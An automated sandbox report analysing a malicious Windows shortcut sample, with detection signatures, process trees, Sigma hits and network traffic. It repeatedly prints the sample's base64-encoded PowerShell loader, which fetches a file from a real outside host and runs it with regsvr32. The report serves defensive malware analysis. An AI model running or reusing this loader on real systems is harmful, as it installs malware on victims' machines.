Windows Analysis Report
DRlFlg7OV8.lnk

Overview

General Information

Sample name: DRlFlg7OV8.lnk (renamed because original name is a hash value)
Original sample name: 09f44c33ba0a5f1e22cd5b8b0d40c9808e2668ee9050ac855a6ae0744bc9e924.lnk
Analysis ID: 1583270
MD5: 3952caf999263773be599357388159e0
SHA1: 76c39a3a4823beab79e497bfcdbc2367188d95c4
SHA256: 09f44c33ba0a5f1e22cd5b8b0d40c9808e2668ee9050ac855a6ae0744bc9e924
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Powershell creates an autostart link
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64_ra
  • powershell.exe (PID: 6984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • regsvr32.exe (PID: 6520 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • svchost.exe (PID: 6344 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 6984
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x2ebb:$b2: ::FromBase64String(
  • 0x2de06:$b2: ::FromBase64String(
  • 0x2e0b1:$b2: ::FromBase64String(
  • 0x7f285:$b2: ::FromBase64String(
  • 0x7f3b2:$b2: ::FromBase64String(
  • 0x8417d:$b2: ::FromBase64String(
  • 0x127800:$b2: ::FromBase64String(
  • 0x127a78:$b2: ::FromBase64String(
  • 0x127f65:$b2: ::FromBase64String(
  • 0x128407:$b2: ::FromBase64String(
  • 0x12fc26:$b2: ::FromBase64String(
  • 0x13db81:$b2: ::FromBase64String(
  • 0x146046:$b2: ::FromBase64String(
  • 0x152112:$b2: ::FromBase64String(
  • 0x1523bd:$b2: ::FromBase64String(
  • 0x295aa0:$b2: ::FromBase64String(
  • 0x295ecb:$b2: ::FromBase64String(
  • 0x2961bb:$b2: ::FromBase64String(
  • 0x299405:$b2: ::FromBase64String(
  • 0x117b1:$s1: -join
  • 0x11efe:$s1: -join

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ProcessId: 6984, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, CommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6440, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, ProcessId: 6520, ProcessName: regsvr32.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ProcessId: 6984, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ProcessId: 6984, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6984, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1, ProcessId: 6440, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ProcessId: 6984, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, CommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6440, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/znsrPecXVb.dMo, ProcessId: 6520, ProcessName: regsvr32.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "SRW735125373WM.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7SVdSIGh0dHA6Ly9mb2N1c21lZGljYS5pbi9mbWxpYi9JeEJBQk1oMEkyY0xNM3FxMUdWdi8gLU91dEZpbGUgJGVudjpURU1QL3puc3JQZWNYVmIuZE1vO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvem5zclBlY1hWYi5kTW8=')) > "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1", ProcessId: 6984, ProcessName: powershell.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6984, TargetFilename: C:\Users\user\AppData\Local\Temp\gjRzEyUDTV.ps1
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6344, ProcessName: svchost.exe
Timestamp: 2025-01-02T10:04:37.521177+0100 | SID: 1810000 | Severity: 1 | Classtype: Potentially Bad Traffic | Source IP: 192.168.2.16 | Source Port: 49706 | Destination IP: 166.62.28.147 | Destination Port: 80 | Protocol: TCP


AV Detection

Source: DRlFlg7OV8.lnk; Avira: detected
Source: DRlFlg7OV8.lnk; Virustotal: Detection: 62%
Source: DRlFlg7OV8.lnk; ReversingLabs: Detection: 66%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.1% probability
Source: DRlFlg7OV8.lnk; Joe Sandbox ML: detected
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1275850448.0000027B9D226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.1275850448.0000027B9D226000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic; Suricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.16:49706 -> 166.62.28.147:80
Source: Joe Sandbox View; ASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
Source: global traffic; HTTP traffic detected: GET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: focusmedica.in; Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: focusmedica.in; Connection: Keep-Alive
Source: global traffic; DNS traffic detected: DNS query: focusmedica.in
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Thu, 02 Jan 2025 09:04:36 GMT; Server: Apache; Content-Length: 315; Keep-Alive: timeout=5; Connection: Keep-Alive; Content-Type: text/html; charset=iso-8859-1; Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a; Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
